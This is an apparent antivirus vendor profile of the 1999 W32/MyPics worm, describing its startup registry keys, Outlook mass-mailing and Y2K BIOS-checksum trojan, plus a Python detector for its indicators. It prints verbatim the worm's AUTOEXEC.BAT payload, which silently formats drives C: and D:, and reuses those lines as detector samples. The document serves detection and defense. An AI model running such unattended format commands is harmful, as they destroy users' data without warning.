W32/MyPics.worm
 
Profile

Name
W32/Mypics.worm

Aliases
I-Worm.Mypics, W32/Mypics.bat, W32/Mypics.com, W32/Mypics.worm

Variants
W32/Mypics.com, W32/Mypics.bat

Date Added
12/2/99

Information
Discovery Date: 11/29/99
Type: Virus
SubType: worm
Risk Assessment: medium
Minimum DAT: 4055
Minimum Engine: 4.0.25

Characteristics
This worm was written in Visual Basic and depends on the runtime library file MSVBVM50.DLL; without this file the program fails with an error. When run, the file copies itself to the local machine and registers itself to run at system startup from one of these registry locations, depending on whether the operating system is Windows 9x or NT:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\Run

While the file runs as a task in memory it performs two functions: one spreads the worm via an email routine, the other monitors the system clock for January 1st 2000.

If executed, this worm distributes itself by mass email. It appears to use code similar to the W97M/Melissa virus, sending itself via MS Outlook to the first 50 email recipients. However, the emails created by this worm contain no subject line, only the message body "Here's some pictures for you !" and the attached file "Pics4You.exe", 34,304 bytes in size.

If the worm is running as a task and detects that the year has changed from 1999 to 2000, it writes a .COM file named "CBIOS.COM" to the root of drive C: on the local machine. This small file is a trojan that overwrites the BIOS checksum value on the local system.

The AUTOEXEC.BAT is also overwritten with these instructions:

ctty nul
format d: /autotest /q /u
format c: /autotest /q /u
c:\cbios.com

Since Windows NT does not process the AUTOEXEC.BAT startup file, this file is never run on NT. After the AUTOEXEC.BAT modification, the user's browser home page is reset to point to the following web location: http://www.geocities.com/SiliconValley/Vista/8279/index.html

Reset your browser home page manually to correct this.

In AVERT testing on a standard Windows 95 system, if the system date is already beyond January 1, 2000 when this worm is initially installed, the damaging payload is not exhibited.

Both the BAT and COM files are detected as "W32/Mypics.bat" and "W32/Mypics.com" respectively.
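As an added example (not AVERT's code), the following Python checks constructed input against the indicators the profile lists above: the AUTOEXEC.BAT payload lines and the traits of the worm's outgoing mail (no subject, the fixed body text, and the Pics4You.exe attachment of 34,304 bytes). The sample data at the bottom is constructed from the text of this profile.

```python
import re

# Mail indicators quoted from the profile above
MYPICS_BODY = "Here's some pictures for you !"
MYPICS_ATTACHMENT = "pics4you.exe"
MYPICS_ATTACHMENT_SIZE = 34304

# "format X: ... /autotest ... /u": an unattended, unconditional format
FORMAT_RE = re.compile(r"^format\s+[a-z]:\s+(?=.*/autotest)(?=.*/u\b)", re.IGNORECASE)


def check_autoexec(text):
    """Return a list of findings for AUTOEXEC.BAT content matching the worm's payload."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        low = line.lower()
        if low == "ctty nul":
            findings.append("console silenced: ctty nul")
        elif FORMAT_RE.match(line):
            findings.append("unattended unconditional format: " + line)
        elif low.endswith("cbios.com"):
            findings.append("BIOS checksum trojan invoked: " + line)
    return findings


def check_email(subject, body, attachments):
    """Score one message against the worm's mail traits.
    attachments: iterable of (filename, size_in_bytes).
    Returns (matched_indicators, is_mypics); is_mypics is True only when all three match."""
    hits = []
    if not (subject or "").strip():
        hits.append("empty subject")
    if body.strip() == MYPICS_BODY:
        hits.append("mypics body text")
    for name, size in attachments:
        if name.lower() == MYPICS_ATTACHMENT and size == MYPICS_ATTACHMENT_SIZE:
            hits.append("Pics4You.exe attachment, 34,304 bytes")
            break
    return hits, len(hits) == 3


if __name__ == "__main__":
    # Constructed sample AUTOEXEC.BAT content, taken from the profile's listing
    sample_bat = "ctty nul\nformat d: /autotest /q /u\nformat c: /autotest /q /u\nc:\\cbios.com\n"
    for finding in check_autoexec(sample_bat):
        print("AUTOEXEC.BAT:", finding)
    # Constructed sample message with the worm's traits
    hits, verdict = check_email("", "Here's some pictures for you !", [("Pics4You.exe", 34304)])
    print("mail indicators:", hits, "-> W32/Mypics.worm" if verdict else "-> no match")
```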

Symptoms
Existence of this file on the local system; modifications to the system registry as mentioned above; mass mailings as mentioned above.

Method Of Infection
Running the executable causes it to copy itself directly to the local system and run the mass mailing routine.

EXTRA Drivers
VirusScan 4 with the 4.0.25 engine (and above).
Dr. Solomon's AVTK 7.95 (and above).
There is no detection for VirusScan 3.

Removal Instructions
Use current engine and DAT files for detection and removal.